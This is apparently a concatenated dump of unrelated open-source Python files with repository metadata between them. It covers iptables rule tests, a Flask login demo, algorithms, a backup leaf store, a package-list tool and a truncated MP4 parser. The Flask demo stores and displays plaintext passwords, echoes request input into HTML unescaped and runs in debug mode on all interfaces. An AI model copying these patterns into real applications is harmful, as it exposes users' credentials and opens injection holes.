"src_ports": [0, "2:3", 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,
14, 15, 16, 17]
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmp --source 10.0.0.0/8 "
"--match icmp --icmp-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 0,2:3,4,5,6,7,8,9,10,11,12,13,14,15 "
"--jump RETURN",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 16,17 "
"--jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 6,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7,
"action": "deny"
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump DROP",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
]
FROM_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-from-abcd --jump MARK --set-mark 0/0x1000000',
# From chain polices the MAC address.
'--append felix-from-abcd --match mac ! --mac-source aa:22:33:44:55:66 '
'--jump DROP -m comment --comment '
'"Incorrect source MAC"',
# Now the tiered policies. For each tier we reset the "next tier" mark.
'--append felix-from-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
# Then, for each policy, we jump to the policy chain, and check if it set the
# accept mark, which immediately accepts.
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p2-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
# Then, at the end of the tier, drop if nothing in the tier did a
# "next-tier"
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Now the second tier...
'--append felix-from-abcd '
'--jump MARK --set-mark 0/0x2000000 --match comment '
'--comment "Start of tier tier_2"',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t2p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 --match comment '
'--comment "Return if policy accepted" --jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --match comment '
'--comment "Drop if no policy in tier passed" --jump DROP',
# Jump to the first profile.
'--append felix-from-abcd --jump felix-p-prof-1-o',
# Short-circuit: return if the first profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile.
'--append felix-from-abcd --jump felix-p-prof-2-o',
# Return if the second profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop the packet if nothing matched.
'--append felix-from-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
TO_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-to-abcd --jump MARK --set-mark 0/0x1000000',
# Then do the tiered policies in order. Tier 1:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Tier 2:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_2"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t2p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Jump to first profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop anything that doesn't match.
'--append felix-to-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
class TestGlobalChains(BaseTestCase):
def setUp(self):
super(TestGlobalChains, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_build_input_chain(self):
chain, deps = self.iptables_generator.filter_input_chain(ip_version=4)
self.assertEqual(chain, INPUT_CHAINS["Default"])
self.assertEqual(deps, set())
def test_build_input_chain_ipip(self):
chain, deps = self.iptables_generator.filter_input_chain(
ip_version=4,
hosts_set_name="felix-hosts")
self.assertEqual(chain, INPUT_CHAINS["IPIP"])
self.assertEqual(deps, set())
def test_build_input_chain_return(self):
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "RETURN"
}
config = load_config("felix_default.cfg", host_dict=host_dict)
chain, deps = config.plugins["iptables_generator"].filter_input_chain(
ip_version=6)
self.assertEqual(chain, INPUT_CHAINS["Return"])
self.assertEqual(deps, set(["felix-FROM-ENDPOINT"]))
class TestRules(BaseTestCase):
def setUp(self):
super(TestRules, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_profile_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names("prof1")
self.assertEqual(chain_names, set(["felix-p-prof1-i", "felix-p-prof1-o"]))
def test_tiered_policy_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names(
TieredPolicyId("tier", "pol")
)
self.assertEqual(chain_names,
set(['felix-p-tier/pol-o',
'felix-p-tier/pol-i']))
def test_split_port_lists(self):
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, "2:3", 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17]),
[['1', '2:3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16', '17']]
)
def test_rules_generation(self):
for test in RULES_TESTS:
updates, deps = self.iptables_generator.profile_updates(
test["profile"]["id"],
test["profile"],
test["ip_version"],
test["tag_to_ipset"],
selector_to_ipset=test.get("sel_to_ipset", {}),
on_allow=test.get("on_allow", "RETURN"),
on_deny=test.get("on_deny", "DROP")
)
self.assertEqual((updates, deps), (test["updates"], {}))
def test_unknown_action(self):
updates, deps = self.iptables_generator.profile_updates(
"prof1",
{
"inbound_rules": [{"action": "unknown"}],
"outbound_rules": [{"action": "unknown"}],
},
4,
{},
selector_to_ipset={},
)
self.maxDiff = None
# Should get back a drop rule.
drop_rules_i = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-i",
None,
"ERROR failed to parse rules",
)
drop_rules_o = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-o",
None,
"ERROR failed to parse rules",
)
self.assertEqual(
updates,
{
'felix-p-prof1-i':
['--append felix-p-prof1-i --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_i +
['--append felix-p-prof1-i --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'],
'felix-p-prof1-o':
['--append felix-p-prof1-o --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_o +
['--append felix-p-prof1-o --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000']
}
)
def test_bad_icmp_type(self):
with self.assertRaises(UnsupportedICMPType):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"icmp_type": 255}, 4, {}, {}
)
def test_bad_protocol_with_ports(self):
with self.assertRaises(AssertionError):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"protocol": "10", "src_ports": [1]}, 4, {}, {}
)
class TestEndpoint(BaseTestCase):
def setUp(self):
super(TestEndpoint, self).setUp()
self.config = load_config("felix_default.cfg")
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_endpoint_chain_names(self):
self.assertEqual(
self.iptables_generator.endpoint_chain_names("abcd"),
set(["felix-to-abcd", "felix-from-abcd"]))
def test_get_endpoint_rules(self):
expected_result = (
{
'felix-from-abcd': FROM_ENDPOINT_CHAIN,
'felix-to-abcd': TO_ENDPOINT_CHAIN
},
{
# From chain depends on the outbound profiles.
'felix-from-abcd': set(['felix-p-prof-1-o',
'felix-p-prof-2-o',
'felix-p-t1p1-o',
'felix-p-t1p2-o',
'felix-p-t2p1-o',]),
# To chain depends on the inbound profiles.
'felix-to-abcd': set(['felix-p-prof-1-i',
'felix-p-prof-2-i',
'felix-p-t1p1-i',
'felix-p-t1p2-i',
'felix-p-t2p1-i',])
}
)
tiered_policies = OrderedDict()
tiered_policies["tier_1"] = ["t1p1", "t1p2"]
tiered_policies["tier_2"] = ["t2p1"]
result = self.iptables_generator.endpoint_updates(4, "e1", "abcd",
"aa:22:33:44:55:66",
["prof-1", "prof-2"],
tiered_policies)
# Log the whole diff if the comparison fails.
self.maxDiff = None
self.assertEqual(result, expected_result)
| apache-2.0 | -435,367,150,946,990,660 | 39.4 | 110 | 0.507983 | false | 3.737 | true | false | false |
seerjk/reboot06 | 06/homework/demo1.py | 1 | 2785 | # coding:utf-8
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/login')
def index():
# return "<h1>hello world</h1>"
# return '<input type="button" value="click me">'
# default dir: ./templates
return render_template("login.html")
@app.route('/reboot')
def reboot():
return "<h1>hello, reboot</h1>"
@app.route('/test1')
def test1():
age = request.args.get('age')
print age
return "<h2>ages: %s</h2>" % age
@app.route('/test_form')
def test_form():
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name == "jiangk":
if passwd == "12345":
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
#
try:
with open('user.txt') as f:
lines = f.readlines()
except Exception, e:
print "Error"
exit(-1)
user_dict = {}
for line in lines:
line = line.strip().split(' ')
user_dict[line[0]] = line[1]
@app.route('/test_user_file')
def test_user_file():
global user_dict
name = request.args.get('name')
passwd = request.args.get('passwd')
res = ""
if name in user_dict:
if passwd == user_dict[name]:
res = "Welcome %s" % name
else:
res = "passord wrong."
else:
res = "%s doesn't exist." % name
return res
@app.route('/table1')
def table1():
return render_template("table1.html")
@app.route('/print_table')
def print_table():
res = '''
<table border="1">
<thead>
<tr>
<th>name</th>
<th>passwd</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/user_table')
def user_table():
res = '''
<table border="1">
<thead>
<tr>
<th>姓名</th>
<th>密码</th>
<th>操作</th>
</tr>
</thead>
<tbody>
'''
for name, pwd in user_dict.items():
res += '''
<tr>
<td>%s</td>
<td>%s</td>
</tr>
''' % (name, pwd)
res += '''
</tbody>
</table>
'''
return res
@app.route('/test_args')
def test_args():
name = request.args.get('name')
print "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
return "len: %d, name: (%s), type: %s" %( len(name), name, type(name))
if __name__ == "__main__":
app.run(host="0.0.0.0", port=9002, debug=True)
| mit | 8,115,482,448,132,503,000 | 19.094203 | 74 | 0.475298 | false | 3.243275 | true | false | false |
yochow/autotest | utils/coverage_suite.py | 1 | 1761 | #!/usr/bin/python
import os, sys
import unittest_suite
import common
from autotest_lib.client.common_lib import utils
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def is_valid_directory(dirpath):
if dirpath.find('client/tests') >= 0:
return False
elif dirpath.find('client/site_tests') >= 0:
return False
elif dirpath.find('tko/migrations') >= 0:
return False
elif dirpath.find('server/tests') >= 0:
return False
elif dirpath.find('server/site_tests') >= 0:
return False
else:
return True
def is_valid_filename(f):
# has to be a .py file
if not f.endswith('.py'):
return False
    # but there are exceptions
if f.endswith('_unittest.py'):
return False
elif f == '__init__.py':
return False
elif f == 'common.py':
return False
else:
return True
def main():
coverage = os.path.join(root, "contrib/coverage.py")
unittest_suite = os.path.join(root, "unittest_suite.py")
    # remove preceding coverage data
cmd = "%s -e" % (coverage)
utils.system_output(cmd)
# run unittest_suite through coverage analysis
cmd = "%s -x %s" % (coverage, unittest_suite)
utils.system_output(cmd)
    # now walk through the directory tree grabbing lists of files
module_strings = []
for dirpath, dirnames, files in os.walk(root):
if is_valid_directory(dirpath):
for f in files:
if is_valid_filename(f):
temp = os.path.join(dirpath, f)
module_strings.append(temp)
# analyze files
cmd = "%s -r -m %s" % (coverage, " ".join(module_strings))
utils.system(cmd)
if __name__ == "__main__":
main()
| gpl-2.0 | 2,078,749,227,466,979,800 | 24.521739 | 69 | 0.593981 | false | 3.645963 | true | false | false |
KingSpork/sporklib | algorithms/search_and_sort_algorithms.py | 1 | 2377 | import random
'''Binary Search'''
def binarySearch(someList, target):
lo = 0
hi = len(someList)
while lo+1 < hi:
test = (lo + hi) / 2
if someList[test] > target:
hi = test
else:
lo = test
if someList[lo] == target:
return lo
else:
return -1
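# Added illustration (not part of the original module): the input list must already be
# sorted in ascending order.
#   binarySearch([1, 3, 5, 7, 9], 7)  ->  3
#   binarySearch([1, 3, 5, 7, 9], 4)  -> -1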
'''Find duplicates in array/list'''
def findDupes(someList):
dupes = []
hashTable = {}
uniques = set(someList)
if len(uniques) != len(someList):
for item in someList:
if hashTable.has_key(item) == True:
dupes.append(item)
else:
hashTable[item] = 0
return dupes
'''QuickSort, f yeah'''
def quickSort(someList):
listSize = len(someList) #get the length of the list
if len(someList) == 0: #if the list is empty...
return [] #...return an empty list
#ok, it gets real
less = [] #make an empty list for less
greater = [] #make an empty liss for greater
pivot = someList.pop(random.randint(0, listSize-1))
for element in someList:
if element <= pivot:
less.append(element)
else:
greater.append(element)
retList = quickSort(less) + [pivot] + quickSort(greater)
#print("Return list:");print(retList)
return retList
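# Added note: choosing the pivot at random makes the O(n^2) worst case unlikely for any
# particular input ordering, at the cost of an O(n) pop from the middle of the list.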
''' Heap Sort '''
def swap(someList, i, j):
someList[i], someList[j] = someList[j], someList[i]
def heapify(someList):
length = len(someList)
start = (length - 1) / 2
while start >= 0:
siftDown(someList, start, length-1)
start = start - 1
def siftDown(someList, start, end):
root = start #integers for indexes, remember
while (root * 2 + 1) <= end: #while root has at least one child
child = root * 2 + 1
swapper = root
if someList[swapper] < someList[child]:
swapper = child
if child+1 <= end and someList[swapper] < someList[child+1]:
swapper = child + 1
if swapper != root:
print("root: " + str(root) + " swapper: " + str(swapper))
try:
print("values: " + str(someList[root]) + " , " + str(someList[swapper]))
except:
print("Root or swapper out of range")
swap(someList, root, swapper)
root = swapper
else:
return
def heapSort(someList):
end = len(someList) -1
heapify(someList)
while end > 0:
swap(someList, end, 0)
end = end - 1
siftDown(someList, 0, end)
def isEqual(int1, int2, int3):
if int1 == int2 == int3:
return True
else:
return False | unlicense | 1,480,981,274,070,060,800 | 21.554455 | 76 | 0.611695 | false | 2.874244 | false | false | false |
obnam-mirror/obnam | obnamlib/fmt_ga/leaf_store.py | 1 | 2653 | # Copyright 2016-2017 Lars Wirzenius
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =*= License: GPL-3+ =*=
import tracing
import obnamlib
class LeafStoreInterface(object): # pragma: no cover
def put_leaf(self, leaf):
raise NotImplementedError()
def get_leaf(self, leaf_id):
raise NotImplementedError()
def remove_leaf(self, leaf_id):
raise NotImplementedError()
def flush(self):
raise NotImplementedError()
class InMemoryLeafStore(LeafStoreInterface):
def __init__(self):
self._leaves = {}
self._counter = 0
def put_leaf(self, leaf):
self._counter += 1
self._leaves[self._counter] = leaf
return self._counter
def get_leaf(self, leaf_id):
return self._leaves.get(leaf_id, None)
def remove_leaf(self, leaf_id):
if leaf_id in self._leaves:
del self._leaves[leaf_id]
def flush(self):
pass
class LeafStore(LeafStoreInterface): # pragma: no cover
def __init__(self):
self._blob_store = None
def set_blob_store(self, blob_store):
self._blob_store = blob_store
def put_leaf(self, leaf):
leaf_id = self._blob_store.put_blob(leaf.as_dict())
tracing.trace('new leaf %s', leaf_id)
return leaf_id
def get_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
blob = self._blob_store.get_blob(leaf_id)
if blob is None:
tracing.trace('no blob for leaf %r', leaf_id)
return None
tracing.trace('got blob for leaf %r', leaf_id)
leaf = obnamlib.CowLeaf()
leaf.from_dict(self._blob_store.get_blob(leaf_id))
return leaf
def remove_leaf(self, leaf_id):
tracing.trace('leaf_id %s', leaf_id)
# FIXME: This is a bit ugly, since we need to break the
# bag/blob store abstraction.
bag_id, _ = obnamlib.parse_object_id(leaf_id)
self._blob_store._bag_store.remove_bag(bag_id)
def flush(self):
self._blob_store.flush()
| gpl-3.0 | 48,278,622,617,393,850 | 26.635417 | 71 | 0.636638 | false | 3.65931 | false | false | false |
fabaff/fsl | fsl-maintenance.py | 1 | 7450 | #!/usr/bin/env python3
#
# fsl-maintenance - A helper script to maintain the Security Lab package list
# and other relevant maintenance tasks.
#
# Copyright (c) 2012-2019 Fabian Affolter <[email protected]>
#
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Credits goes to Robert Scheck. He did a lot brain work for the initial
# approach. This script is heavy based on his Perl scripts.
import argparse
import operator
import itertools
import datetime
import re
import sys
import os
try:
import columnize
except ImportError:
print("Please install pycolumnize first -> sudo dnf -y install python3-columnize")
import dnf
try:
import git
except ImportError:
print("Please install GitPython first -> sudo dnf -y install python3-GitPython")
try:
import yaml
except ImportError:
print("Please install PyYAML first -> sudo dnf -y install PyYAML")
try:
import click
except ImportError:
print("Please install click first -> sudo dnf -y install python3-click")
DEFAULT_FILENAME = 'pkglist.yaml'
repo = git.Repo(os.getcwd())
def getPackages():
"""Read YAML package file and return all packages."""
file = open(DEFAULT_FILENAME, 'r')
pkgslist = yaml.safe_load(file)
file.close()
return pkgslist
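# Added note: pkglist.yaml is expected to contain a list of package entries; the keys
# used by this script are 'pkg', 'exclude', 'command', 'name' and 'category'.  An entry
# might look roughly like this (illustrative values only):
#
#   - pkg: nmap
#     name: Nmap
#     command: nmap
#     category: Reconnaissance
#     exclude: 0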
@click.group()
@click.version_option()
def cli():
"""fsl-maintenance
This tool can be used for maintaining the Fedora Security Lab package list.
"""
@cli.group()
def display():
"""Display the details about the packages."""
@display.command('full')
def full():
"""All included tools and details will be printed to STDOUT."""
pkgslist = getPackages()
pkgslistIn = []
pkgslistEx = []
pkgslistAll = []
# All packages
pkgslistAll = []
for pkg in pkgslist:
pkgslistAll.append(pkg['pkg'])
# Split list of packages into included and excluded packages
# Not used at the moment
#for pkg in pkgslist:
# if 'exclude' in pkg:
# pkgslistEx.append(pkg['pkg'])
# else:
# pkgslistIn.append(pkg['pkg'])
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab.\n")
print("Packages in comps : ", len(pkgslist))
#print("Packages included in live media : ", len(pkgslistIn))
print("\nPackage listing:")
sorted_pkgslist = sorted(pkgslistAll)
print(columnize.columnize(sorted_pkgslist, displaywidth=72))
@display.command('raw')
def raw():
"""The pkglist.yaml file will be printed to STDOUT."""
pkgslist = getPackages()
print(yaml.dump(pkgslist))
@display.command('short')
def short():
"""Only show the absolute minimum about the package list."""
pkgslist = getPackages()
# Displays the details to STDOUT
print("\nDetails about the packages in the Fedora Security Lab\n")
print("Packages in comps : ", len(pkgslist))
print("\nTo see all available options use -h or --help.")
@cli.group()
def output():
"""Create various output from the package list."""
@output.command('comps')
def comps():
"""
Generates the entries to include into the comps-fXX.xml.in file.
<packagelist>
...
</packagelist>
"""
pkgslist = getPackages()
    # Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
entry = ' <packagereq type="default">{}</packagereq>'.format(pkg['pkg'])
print(entry)
@output.command('playbook')
def playbook():
"""Generate an Ansible playbook for the installation."""
pkgslist = getPackages()
part1 = """# This playbook installs all Fedora Security Lab packages.
#
# Copyright (c) 2013-2018 Fabian Affolter <[email protected]>
#
# All rights reserved.
# This file is licensed under GPLv2, for more details check COPYING.
#
# Generated by fsl-maintenance.py at %s
#
# Usage: ansible-playbook fsl-packages.yml -f 10
---
- hosts: fsl_hosts
user: root
tasks:
- name: install all packages from the FSL
dnf: pkg={{ item }}
state=present
with_items:\n""" % (datetime.date.today())
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
# Write the playbook files
fileOut = open('ansible-playbooks/fsl-packages.yml', 'w')
fileOut.write(part1)
for pkg in sorted_pkgslist:
fileOut.write(' - %s\n' % pkg['pkg'])
fileOut.close()
# Commit the changed file to the repository
repo.git.add('ansible-playbooks/fsl-packages.yml')
repo.git.commit(m='Update playbook')
repo.git.push()
@output.command('live')
def live():
"""Generate the exclude list for the kickstart file."""
pkgslist = getPackages()
# Split list of packages into included and excluded packages
sorted_pkgslist = sorted(pkgslist, key=operator.itemgetter('pkg'))
for pkg in sorted_pkgslist:
if pkg['exclude'] == 1:
print("- ", pkg['pkg'])
@output.command('menus')
def menus():
"""Generate the .desktop files which are used for the menu structure."""
pkgslist = getPackages()
# Terminal is the standard terminal application of the Xfce desktop
terminal = 'xfce4-terminal'
# Collects all files in the directory
filelist = []
os.chdir('security-menu')
for files in os.listdir("."):
if files.endswith(".desktop"):
filelist.append(files)
# Write the .desktop files
for pkg in pkgslist:
if 'command' and 'name' in pkg:
file_out = open('security-{}.desktop'.format(pkg['pkg']), 'w')
file_out.write('[Desktop Entry]\n')
file_out.write('Name={}\n'.format(pkg['name']))
file_out.write("Exec={} -e \"su -c '{}; bash'\"\n".format(
terminal, pkg['command']))
file_out.write('TryExec={}\n'.format(pkg['pkg']))
file_out.write('Type=Application\n')
file_out.write('Categories=System;Security;X-SecurityLab;'
'X-{};\n'.format(pkg['category']))
file_out.close()
# Compare the needed .desktop file against the included packages, remove
# .desktop files from exclude packages
dellist = filelist
for pkg in pkgslist:
if 'command' in pkg:
dellist.remove('security-{}.desktop'.format(pkg['pkg']))
if 'exclude' in pkg:
if pkg['exclude'] == 1:
dellist.append('security-{}.desktop'.format(pkg['pkg']))
# Remove the .desktop files which are no longer needed
if len(dellist) != 0:
for file in dellist:
os.remove(file)
if __name__ == '__main__':
cli()
| gpl-2.0 | -920,566,221,492,696,600 | 29.658436 | 86 | 0.654497 | false | 3.87013 | false | false | false |
hyt-hz/mediautils | mediautils/mp4/parser.py | 1 | 9133 | import struct
import traceback
import logging
class FileCache(object):
def __init__(self, file_obj, cache_size=0x0FFF):
self._file = file_obj
self._cache = None
self._cache_read_size = cache_size
self._cache_offset = 0
self.offset = 0
def read_from(self, start_offset, size, move=True):
if self._cache is None \
or start_offset >= self._cache_offset + self._cache_size \
or start_offset < self._cache_offset:
self._read2cache(start_offset)
if self._cache_size == 0:
return ''
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data = self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return ''
while True:
if start_offset + size <= self._cache_offset + self._cache_size:
if move:
self.offset = start_offset + size
return data + self._cache[(start_offset-self._cache_offset):(start_offset+size-self._cache_offset)]
else:
data += self._cache[(start_offset-self._cache_offset):]
self._read2cache()
if self._cache_size == 0:
return data
def read(self, size):
return self.read_from(self.offset, size)
def peek(self, size):
return self.read_from(self.offset, size, move=False)
def seek(self, offset):
self._file.seek(offset)
self.offset = offset
def tell(self):
return self.offset
def forward(self, size):
self.offset += size
def backward(self, size):
if self.offset <= size:
self.offset = 0
else:
self.offset -= size
def _read2cache(self, offset=None):
if offset is None:
# continue
self._cache_offset += self._cache_size
self._cache = self._file.read(self._cache_read_size)
else:
self._file.seek(offset)
self._cache = self._file.read(self._cache_read_size)
self._cache_offset = offset
@property
def _cache_size(self):
if self._cache:
return len(self._cache)
return 0
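# Illustrative use of FileCache (added sketch; 'movie.mp4' is a placeholder file name):
#
#   with open('movie.mp4', 'rb') as f:
#       data = FileCache(f, cache_size=0x0FFF)
#       box_type = data.peek(8)[4:8]   # look ahead without moving the offset
#       header = data.read(8)          # read and advance the offset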
class BoxMetaClass(type):
def __init__(cls, name, bases, dct):
if hasattr(cls, 'boxtype'):
cls.box_classes[cls.boxtype] = cls
super(BoxMetaClass, cls).__init__(name, bases, dct)
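# Added note: the metaclass above auto-registers every Box subclass that defines a
# 'boxtype' attribute into Box.box_classes, which Box.factory() later uses to pick the
# right parser class for each box encountered in the stream.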
class Box(object):
box_classes = {} # key value pair of box type name and corresponding subclass
# filled by metaclass
__metaclass__ = BoxMetaClass
direct_children = False
def __init__(self, data, parent):
self.box_offset = data.tell()
self.parent = parent
self.size, = struct.unpack('>I', data.read(4))
self.type = data.read(4)
self.next = None
self.children = []
if self.size == 1:
# 64-bit size
self.size, = struct.unpack('>Q', data.read(8))
elif self.size == 0:
# to the end of file
pass
else:
pass
self.body_offset = data.tell()
self._parse(data)
def _parse(self, data):
if self.direct_children:
self._parse_child(data)
else:
data.seek(self.box_offset+self.size)
def _parse_child(self, data):
while True:
if self.parent and self.parent.end_offset and data.tell() >= self.parent.end_offset:
return
if self.end_offset and data.tell() >= self.end_offset:
return
try:
child = Box.factory(data, self)
except Exception:
print traceback.format_exc()
return
if child:
self.children.append(child)
else:
return
def iter_child(self, deep=False):
for child in self.children:
yield child
if deep:
for box in child.iter_child(deep=True):
yield box
@property
def end_offset(self):
if self.size:
return self.box_offset + self.size
else:
return 0
def find_children(self, box_type, deep=False, only_first=False):
children = []
for child in self.iter_child(deep=deep):
if child.type == box_type:
if only_first:
return child
else:
children.append(child)
return children
@classmethod
def factory(cls, data, parent):
boxtype = data.peek(8)[4:8]
if len(boxtype) == 0:
return None
if boxtype in cls.box_classes:
return cls.box_classes[boxtype](data, parent)
else:
return cls(data, parent)
class BoxRoot(Box):
boxtype = 'ROOT'
direct_children = True
def __init__(self, data):
self.box_offset = data.tell()
self.body_offset = self.box_offset
self.parent = None
self.size = 0
self.type = self.boxtype
self.children = []
self._parse(data)
class BoxMoov(Box):
boxtype = 'moov'
def _parse(self, data):
self._parse_child(data)
class BoxTrak(Box):
boxtype = 'trak'
direct_children = True
class BoxMdia(Box):
boxtype = 'mdia'
direct_children = True
class BoxMdhd(Box):
boxtype = 'mdhd'
def _parse(self, data):
self.version, = struct.unpack('>B', data.read(1))
self.flag = data.read(3)
if self.version == 0:
